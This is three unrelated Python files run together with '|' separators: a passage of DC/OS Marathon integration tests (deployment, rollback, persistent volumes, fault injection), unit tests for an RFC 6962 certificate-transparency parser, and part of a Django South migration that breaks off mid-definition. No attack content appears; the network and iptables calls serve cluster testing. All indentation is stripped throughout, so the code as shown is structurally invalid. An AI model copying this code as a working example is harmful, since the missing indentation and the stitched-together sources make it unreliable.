app_def['cpus'] = max(0.6, cores - 0.5)
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
client.scale_app(app_id, 2)
time.sleep(5)
deployments = client.get_deployments(app_id=app_id)
tasks = client.get_tasks(app_id)
# still deploying
assert len(deployments) == 1, "The number of deployments is {}, but 1 was expected".format(len(deployments))
assert len(tasks) == 1, "The number of tasks is {}, but 1 was expected".format(len(tasks))
@private_agents(2)
def test_pinned_task_does_not_find_unknown_host():
"""Tests that a task pinned to an unknown host will not launch.
Within 10 secs it should still be in deployment and 0 tasks should be running.
"""
app_def = apps.sleep_app()
common.pin_to_host(app_def, '10.255.255.254')
client = marathon.create_client()
client.add_app(app_def)
# Apps normally deploy within seconds; assume that after 10 seconds
# no task has met the placement constraint.
time.sleep(10)
tasks = client.get_tasks(app_def["id"])
assert len(tasks) == 0, "The number of tasks is {}, 0 was expected".format(len(tasks))
@dcos_1_8
def test_restart_container_with_persistent_volume():
"""A task with a persistent volume, which writes to a file in the persistent volume, is launched.
The app is killed and restarted and we can still read from the persistent volume what was written to it.
"""
app_def = apps.persistent_volume_app()
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = "curl {}:{}/data/foo".format(host, port)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task(cmd, target_data):
run, data = run_command_on_master(cmd)
assert run, "{} did not succeed".format(cmd)
assert data == target_data, "'{}' was not equal to {}".format(data, target_data)
check_task(cmd, target_data='hello\n')
client.restart_app(app_id)
deployment_wait(service_id=app_id)
assert_that(lambda: client.get_tasks(app_id), eventually(has_len(equal_to(1)), max_attempts=30))
tasks = client.get_tasks(app_id)  # refresh: the pre-restart task list is stale
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = "curl {}:{}/data/foo".format(host, port)
check_task(cmd, target_data='hello\nhello\n')
@dcos_1_8
def test_app_with_persistent_volume_recovers():
"""Tests that when an app task with a persistent volume gets killed,
it recovers on the node it was launched on, and it gets attached
to the same persistent-volume."""
app_def = apps.persistent_volume_app()
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
task_id = tasks[0]['id']
port = tasks[0]['ports'][0]
host = tasks[0]['host']
cmd = "curl {}:{}/data/foo".format(host, port)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task(cmd, target_data):
run, data = run_command_on_master(cmd)
assert run, "{} did not succeed".format(cmd)
assert target_data in data, "'{}' not found in {}".format(target_data, data)
check_task(cmd, target_data='hello\n')
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def kill_task(host, pattern):
pids = common.kill_process_on_host(host, pattern)
assert len(pids) != 0, "no task got killed on {} for pattern {}".format(host, pattern)
kill_task(host, '[h]ttp\\.server')
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_recovery():
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after recovery, but 1 was expected".format(len(tasks))
new_task_id = tasks[0]['id']
assert task_id != new_task_id, "The task ID has not changed, and is still {}".format(task_id)
check_task_recovery()
port = tasks[0]['ports'][0]
host = tasks[0]['host']
cmd = "curl {}:{}/data/foo".format(host, port)
check_task(cmd, target_data='hello\nhello\n')
def test_app_update():
"""Tests that an app gets successfully updated."""
app_def = apps.mesos_app(app_id='/update-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
app_def['cpus'] = 1
app_def['instances'] = 2
client.update_app(app_id, app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 2, "The number of tasks is {} after deployment, but 2 was expected".format(len(tasks))
def test_app_update_rollback():
"""Tests that an updated app can be rolled back to its initial version."""
app_def = apps.readiness_and_health_app("app-update-rollback")
app_id = app_def["id"]
# First deployment
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(1)))
# Second deployment
app_def['instances'] = 2
client.update_app(app_id, app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(2)))
# Third deployment with rollback
# the long readiness-check interval below delays the deployment, leaving time to roll back while it is in flight
app_def['readinessChecks'][0]['intervalSeconds'] = 30
app_def['instances'] = 1
deployment_id = client.update_app(app_id, app_def)
client.rollback_deployment(deployment_id)
deployment_wait(service_id=app_id)
# the update to 1 instance was rolled back, so 2 instances remain
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(2)))
def test_unhealthy_app_can_be_rolled_back():
"""Verifies that an updated app gets rolled back due to being unhealthy."""
app_def = apps.readiness_and_health_app()
app_id = app_def["id"]
@retrying.retry(
wait_fixed=1000,
stop_max_attempt_number=30,
retry_on_exception=common.ignore_provided_exception(DCOSException)
)
def wait_for_deployment():
deployment_wait(service_id=app_id)
client = marathon.create_client()
client.add_app(app_def)
wait_for_deployment()
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
app_def['healthChecks'][0]['path'] = '/non-existent'
app_def['instances'] = 2
deployment_id = client.update_app(app_id, app_def)
try:
wait_for_deployment()
except Exception:
client.rollback_deployment(deployment_id)
wait_for_deployment()
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after rollback, but 1 was expected".format(len(tasks))
@private_agents(2)
def test_marathon_with_master_process_failure(marathon_service_name):
"""Launches an app and restarts the master. It is expected that the service endpoint eventually comes back and
the task ID stays the same.
"""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
common.systemctl_master('restart')
shakedown.dcos.service.wait_for_service_endpoint(marathon_service_name, path="ping")
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_recovery():
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after master restart, but 1 was expected".format(len(tasks))
assert tasks[0]['id'] == original_task_id, \
"Task {} has not recovered, it got replaced with another one: {}".format(original_task_id, tasks[0]['id'])
check_task_recovery()
@private_agents(2)
def test_marathon_when_disconnected_from_zk():
"""Launches an app from Marathon, then knocks out access to ZK from Marathon.
Verifies the task is preserved.
"""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
common.block_iptable_rules_for_seconds(host, 2181, sleep_seconds=10, block_input=True, block_output=False)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_is_back():
tasks = client.get_tasks(app_id)
assert tasks[0]['id'] == original_task_id, \
"The task {} got replaced with {}".format(original_task_id, tasks[0]['id'])
check_task_is_back()
@private_agents(2)
def test_marathon_when_task_agent_bounced():
"""Launch an app and restart the node the task is running on."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
restart_agent(host)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_is_back():
tasks = client.get_tasks(app_id)
assert tasks[0]['id'] == original_task_id, \
"The task {} got replaced with {}".format(original_task_id, tasks[0]['id'])
check_task_is_back()
def test_default_user():
"""Ensures a task is started as root by default."""
app_def = apps.sleep_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
user = app.get('user')
assert user is None, "User is {}, but it should not have been set".format(user)
tasks = client.get_tasks(app_id)
host = tasks[0]['host']
success = run_command_on_agent(host, "ps aux | grep '[s]leep ' | awk '{if ($1 !=\"root\") exit 1;}'")
assert success, "The app is running as non-root"
@common.marathon_1_4
def test_declined_offer_due_to_resource_role():
"""Tests that an offer gets declined because no resources are allocated for the role.
    In the multi-role world Marathon does not accept an `acceptedResourceRoles` entry that is not
    also the app's `role` (it doesn't make sense, since the app would never start).
    In order to use acceptedResourceRoles: ["very-random-role"] we need to deploy the app
    in a top-level group with the same name ("very-random-role"), and since enforceRole is
    false by default, we also set the role field explicitly (to the same value).
"""
app_def = apps.sleep_app(app_id="/very-random-role/sleep-that-doesnt-start-because-no-resources")
app_def["role"] = "very-random-role"
app_def["acceptedResourceRoles"] = ["very-random-role"]
_test_declined_offer(app_def, 'UnfulfilledRole')
@common.marathon_1_4
def test_declined_offer_due_to_cpu_requirements():
"""Tests that an offer gets declined because the number of CPUs can't be found in an offer."""
app_def = apps.sleep_app()
app_def["cpus"] = 12345
_test_declined_offer(app_def, 'InsufficientCpus')
def _test_declined_offer(app_def, reason):
"""Used to confirm that offers were declined. The `processedOffersSummary` and these tests
in general require 1.4+ marathon with the queue end point.
The retry is the best possible way to "time" the success of the test.
"""
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def verify_declined_offer():
deployments = client.get_deployments(app_id)
assert len(deployments) == 1
offer_summary = client.get_queued_app(app_id)['processedOffersSummary']
role_summary = declined_offer_by_reason(offer_summary['rejectSummaryLastOffers'], reason)
last_attempt = declined_offer_by_reason(offer_summary['rejectSummaryLaunchAttempt'], reason)
assert role_summary['declined'] > 0, "There are no declined offers because of {}".format(reason)
assert role_summary['processed'] > 0, "There are no processed offers for {}".format(reason)
assert last_attempt['declined'] > 0, "There are no declined offers because of {}".format(reason)
assert last_attempt['processed'] > 0, "There are no processed offers for {}".format(reason)
verify_declined_offer()
def declined_offer_by_reason(offers, reason):
for offer in offers:
if offer['reason'] == reason:
del offer['reason']
return offer
return None
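# Example (illustrative counts only): given the summaries from the queue endpoint,
# this returns the first matching entry with its 'reason' key stripped:
#
#   summary = client.get_queued_app(app_id)['processedOffersSummary']
#   declined_offer_by_reason(summary['rejectSummaryLastOffers'], 'InsufficientCpus')
#   # -> {'declined': 3, 'processed': 5}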
@pytest.mark.skipif("common.docker_env_not_set()")
def test_private_repository_docker_app():
username = os.environ['DOCKER_HUB_USERNAME']
password = os.environ['DOCKER_HUB_PASSWORD']
agents = get_private_agents()
common.create_docker_credentials_file(username, password)
common.copy_docker_credentials_file(agents)
app_def = apps.private_docker_app()
app_id = app_def["id"]
if ee_version() == 'strict':
app_def['user'] = 'root'
common.add_dcos_marathon_user_acls()
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
common.assert_app_tasks_running(client, app_def)
def test_ping(marathon_service_name):
"""Tests the Marathon's /ping end-point."""
response = common.http_get_marathon_path('ping', marathon_service_name)
assert response.status_code == 200, "HTTP status code {} is NOT 200".format(response.status_code)
assert 'pong' in response.text, "Got {} instead of pong".format(response.text)
def test_metrics_endpoint(marathon_service_name):
service_url = dcos_service_url(marathon_service_name)
auth = DCOSAcsAuth(dcos_acs_token())
response = requests.get("{}metrics".format(service_url), auth=auth, verify=verify_ssl())
assert response.status_code == 200, "HTTP status code {} is NOT 200".format(response.status_code)
if marathon_version_less_than('1.7'):
metric_name = 'service.mesosphere.marathon.app.count'
else:
metric_name = 'marathon.apps.active.gauge'
response_json = response.json()
logger.info('Found metric gauges: {}'.format(response_json['gauges']))
assert response_json['gauges'][metric_name] is not None, \
"{} is absent".format(metric_name)
def test_healthcheck_and_volume():
    """Launches a Docker container with a health check and volumes on Marathon."""
app_def = apps.healthcheck_and_volume()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
    assert len(app['container']['volumes']) == 2, "The container does not have the correct number of volumes"
# check if app becomes healthy
assert_that(lambda: client.get_app(app_id), eventually(has_value('tasksHealthy', 1), max_attempts=30))
@dcos_1_9
def test_vip_mesos_cmd(marathon_service_name):
"""Validates the creation of an app with a VIP label and the accessibility of the service via the VIP."""
app_def = apps.http_server()
app_id = app_def["id"]
vip_name = app_id.lstrip("/")
fqn = '{}.{}.l4lb.thisdcos.directory'.format(vip_name, marathon_service_name)
app_def['portDefinitions'] = [{
"port": 0,
"protocol": "tcp",
"name": "{}".format(vip_name),
"labels": {
"VIP_0": "/{}:10000".format(vip_name)
}
}]
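    # The VIP_0 label above exposes the app through dcos-l4lb under the fqn
    # constructed earlier, reachable on port 10000.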
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def http_output_check():
time.sleep(1)
common.assert_http_code('{}:{}'.format(fqn, 10000))
http_output_check()
@dcos_1_9
def test_vip_docker_bridge_mode(marathon_service_name):
"""Tests the creation of a VIP from a python command in a docker image using bridge mode.
the test validates the creation of an app with the VIP label and the accessability
of the service via the VIP.
"""
app_def = apps.docker_http_server(app_id='vip-docker-bridge-mode-app')
app_id = app_def["id"]
vip_name = app_id.lstrip("/")
fqn = '{}.{}.l4lb.thisdcos.directory'.format(vip_name, marathon_service_name)
app_def['id'] = vip_name
app_def['container']['docker']['portMappings'] = [{
"containerPort": 8080,
"hostPort": 0,
"labels": {
"VIP_0": "/{}:10000".format(vip_name)
},
"protocol": "tcp",
"name": "{}".format(vip_name)
}]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def http_output_check():
time.sleep(1)
common.assert_http_code('{}:{}'.format(fqn, 10000))
http_output_check()
def requires_marathon_version(version):
"""This python module is for testing root and MoM marathons. The @marathon_1_5
annotation works only for the root marathon. The context switching necessary
for switching the marathons occurs after the evaluation of the pytestmark.
This function is used to ensure the correct version of marathon regardless
of root or mom.
"""
# marathon version captured here will work for root and mom
if marathon_version_less_than(version):
pytest.skip()
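# Example usage (hypothetical test): call it at the top of the test body so the
# version check runs after any root/MoM context switch, unlike a pytestmark:
#
#   def test_some_1_5_feature(marathon_service_name):
#       requires_marathon_version('1.5')
#       ...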
@pytest.mark.parametrize("test_type, get_pinger_app, dns_format", [
('localhost', apps.pinger_localhost_app, '{}.{}.mesos'),
('bridge', apps.pinger_bridge_app, '{}.{}.mesos'),
('container', apps.pinger_container_app, '{}.{}.containerip.dcos.thisdcos.directory'),
])
@dcos_1_9
@private_agents(2)
def test_network_pinger(test_type, get_pinger_app, dns_format, marathon_service_name):
"""This test runs a pinger app and a relay app. It retrieves the python app from the
master via the new http service (which will be moving into shakedown). Then a curl call
to the relay will invoke a call to the 2nd pinger app and return back pong to the relay
then back to curl.
It tests that 1 task can network communicate to another task on the given network
It tests inbound and outbound connectivity
test_type param is not used. It is passed so that it is clear which parametrized test
is running or may be failing.
"""
pinger_app = get_pinger_app()
relay_app = get_pinger_app()
relay_app["id"] = relay_app["id"].replace("pinger", "relay")
pinger_dns = dns_format.format(pinger_app["id"].lstrip("/"), marathon_service_name)
relay_dns = dns_format.format(relay_app["id"].lstrip("/"), marathon_service_name)
# test pinger app to master
copy_file_to_master(os.path.join(scripts.scripts_dir(), "pinger.py"))
client = marathon.create_client()
with master_http_service():
# need to add app with http service in place or it will fail to fetch
client.add_app(pinger_app)
client.add_app(relay_app)
deployment_wait(service_id=pinger_app["id"])
deployment_wait(service_id=relay_app["id"])
wait_for_dns(relay_dns)
relay_url = 'http://{}:7777/relay-ping?url={}:7777'.format(relay_dns, pinger_dns)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=300, retry_on_exception=common.ignore_exception)
def http_output_check():
status, output = run_command_on_master('curl {}'.format(relay_url))
assert status, "curl {} failed on master with {}".format(relay_url, output)
assert 'Pong {}'.format(pinger_app["id"]) in output
assert 'Relay from {}'.format(relay_app["id"]) in output
http_output_check()
@dcos_1_11
def test_ipv6_healthcheck(docker_ipv6_network_fixture):
""" There is new feature in DC/OS 1.11 that allows containers running on IPv6 network to be healthchecked from
Marathon. This tests verifies executing such healthcheck.
"""
app_def = apps.ipv6_healthcheck()
app_id = app_def["id"]
client = marathon.create_client()
target_instances_count = app_def['instances']
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == target_instances_count, \
"The number of running tasks is {}, but {} was expected".format(app['tasksRunning'], target_instances_count)
assert app['tasksHealthy'] == target_instances_count, \
"The number of healthy tasks is {}, but {} was expected".format(app['tasksHealthy'], target_instances_count)
client.remove_app(app['id'], True)
|
|
from ctutlz import rfc6962
def test_parse_log_entry_type_0():
tdf = b'\x00\x00'
parse, offset = rfc6962._parse_log_entry_type(tdf)
assert offset == 2
assert parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_parse_log_entry_type_1():
tdf = b'\x00\x01'
parse, offset = rfc6962._parse_log_entry_type(tdf)
assert offset == 2
assert parse == {
'tdf': b'\x00\x01',
'val': 1,
}
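# The two tests above pin down the parser contract: it reads a two-byte,
# big-endian enum and returns (parse_dict, bytes_consumed). A minimal sketch of
# such a helper (an illustrative assumption, not ctutlz's actual implementation):
#
#   import struct
#
#   def _parse_log_entry_type(tdf):
#       val, = struct.unpack('!H', tdf[:2])
#       return {'tdf': tdf[:2], 'val': val}, 2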
def test_log_entry_type_0_from_tdf():
tdf = b'\x00\x00anything'
log_entry_type = rfc6962.LogEntryType(arg=tdf)
assert log_entry_type.is_x509_entry is True
assert log_entry_type.is_precert_entry is False
assert log_entry_type.tdf == b'\x00\x00'
assert str(log_entry_type) == 'x509_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_log_entry_type_0_from_parse():
parse = {
'tdf': b'\x00\x00',
'val': 0,
}
log_entry_type = rfc6962.LogEntryType(arg=parse)
assert log_entry_type.is_x509_entry is True
assert log_entry_type.is_precert_entry is False
assert log_entry_type.tdf == b'\x00\x00'
assert str(log_entry_type) == 'x509_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_log_entry_type_1_from_tdf():
tdf = b'\x00\x01'
log_entry_type = rfc6962.LogEntryType(arg=tdf)
assert log_entry_type.is_x509_entry is False
assert log_entry_type.is_precert_entry is True
assert log_entry_type.tdf == b'\x00\x01'
assert str(log_entry_type) == 'precert_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x01',
'val': 1,
}
def test_log_entry_type_1_from_parse():
parse = {
'tdf': b'\x00\x01',
'val': 1,
}
log_entry_type = rfc6962.LogEntryType(arg=parse)
assert log_entry_type.is_x509_entry is False
assert log_entry_type.is_precert_entry is True
assert log_entry_type.tdf == b'\x00\x01'
assert str(log_entry_type) == 'precert_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x01',
'val': 1,
}
def test_signature_type_0_from_tdf():
tdf = b'\x00\x01\x02\x03\x04\x05\x06\x07\x89'
signature_type = rfc6962.SignatureType(arg=tdf)
assert signature_type.is_certificate_timestamp is True
assert signature_type.is_tree_hash is False
assert signature_type._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_signature_type_0_from_parse():
parse = {
'tdf': b'\x00',
'val': 0,
}
signature_type = rfc6962.SignatureType(arg=parse)
assert signature_type.is_certificate_timestamp is True
assert signature_type.is_tree_hash is False
assert signature_type._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_signature_type_1_from_tdf():
tdf = b'\x01'
signature_type = rfc6962.SignatureType(arg=tdf)
assert signature_type.is_certificate_timestamp is False
assert signature_type.is_tree_hash is True
assert signature_type._parse == {
'tdf': b'\x01',
'val': 1,
}
def test_signature_type_1_from_parse():
parse = {
'tdf': b'\x01',
'val': 1,
}
signature_type = rfc6962.SignatureType(arg=parse)
assert signature_type.is_certificate_timestamp is False
assert signature_type.is_tree_hash is True
assert signature_type._parse == {
'tdf': b'\x01',
'val': 1,
}
def test_version_from_tdf():
tdf = b'\x00anything'
version = rfc6962.Version(tdf)
assert version.is_v1 is True
assert version._parse == {
'tdf': b'\x00',
'val': 0,
}
# invalid version number
invalid_tdf = b'\x10'
version = rfc6962.Version(invalid_tdf)
assert version.is_v1 is False
assert version._parse == {
'tdf': b'\x10',
'val': 16,
}
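# RFC 6962 defines only version v1 (value 0); any other value, such as 0x10
# above, simply yields is_v1 == False rather than an error.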
def test_version_from_parse():
parse = {
'val': 0,
'tdf': b'\x00',
}
version = rfc6962.Version(arg=parse)
assert version.is_v1 is True
assert version._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_SignedCertificateTimestamp_from_tdf():
tdf = (b'\x00\xeeK\xbd\xb7u\xce`\xba\xe1Bi\x1f\xab\xe1\x9ef\xa3\x0f~_\xb0r'
b'\xd8\x83\x00\xc4{\x89z\xa8\xfd\xcb\x00\x00\x01]\xe7\x11\xf5\xf7'
b'\x00\x00\x04\x03\x00F0D\x02 ph\xa0\x08\x96H\xbc\x1b\x11\x0e\xd0'
b'\x98\x02\xa8\xac\xb8\x19-|,\xe5\x0e\x9e\xf8/_&\xf7b\x88\xb4U\x02 X'
b'\xbc\r>jFN\x0e\xda\x0b\x1b\xb5\xc0\x1a\xfd\x90\x91\xb0&\x1b\xdf'
b'\xdc\x02Z\xd4zd\xd7\x80c\x0f\xd5')
sct = rfc6962.SignedCertificateTimestamp(arg=tdf)
assert sct.log_id.tdf == (b'\xeeK\xbd\xb7u\xce`\xba\xe1Bi\x1f\xab\xe1\x9ef'
b'\xa3\x0f~_\xb0r\xd8\x83\x00\xc4{\x89z\xa8\xfd'
b'\xcb')
assert sct.tdf == tdf
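# For reference, the serialized SCT above follows the RFC 6962 v1 layout:
# 1 byte version, 32 bytes log ID (asserted above), 8 bytes timestamp, a
# length-prefixed extensions field, and finally the digitally-signed signature.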
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'IdMapping'
db.create_table(u'ddsc_core_idmapping', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('timeseries', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ddsc_core.Timeseries'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('remote_id', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'ddsc_core', ['IdMapping'])
# Deleting field 'Timeseries.supplying_system'
db.delete_column(u'ddsc_core_timeseries', 'supplying_system_id')
def backwards(self, orm):
# Deleting model 'IdMapping'
db.delete_table(u'ddsc_core_idmapping')
# Adding field 'Timeseries.supplying_system'
db.add_column(u'ddsc_core_timeseries', 'supplying_system',
self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'timeseries', null=True, to=orm['auth.User'], blank=True),
keep_default=False)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'ddsc_core.compartment': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Compartment'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'numeric_code': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'})
},
u'ddsc_core.folder': {
'Meta': {'object_name': 'Folder'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.idmapping': {
'Meta': {'object_name': 'IdMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'timeseries': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Timeseries']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.location': {
'Meta': {'object_name': 'Location'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'geometry_precision': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'point_geometry': ('django.contrib.gis.db.models.fields.PointField', [], {'dim': '3', 'null': 'True', 'blank': 'True'}),
'real_geometry': ('django.contrib.gis.db.models.fields.GeometryField', [], {'dim': '3', 'null': 'True', 'blank': 'True'})
},
u'ddsc_core.locationgroup': {
'Meta': {'object_name': 'LocationGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'location_groups'", 'blank': 'True', 'to': u"orm['ddsc_core.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
u'ddsc_core.logicalgroup': {
'Meta': {'ordering': "[u'owner', u'name']", 'unique_together': "((u'owner', u'name'),)", 'object_name': 'LogicalGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']"})
},
u'ddsc_core.logicalgroupedge': {
'Meta': {'unique_together': "((u'child', u'parent'),)", 'object_name': 'LogicalGroupEdge'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'childs'", 'to': u"orm['ddsc_core.LogicalGroup']"}),
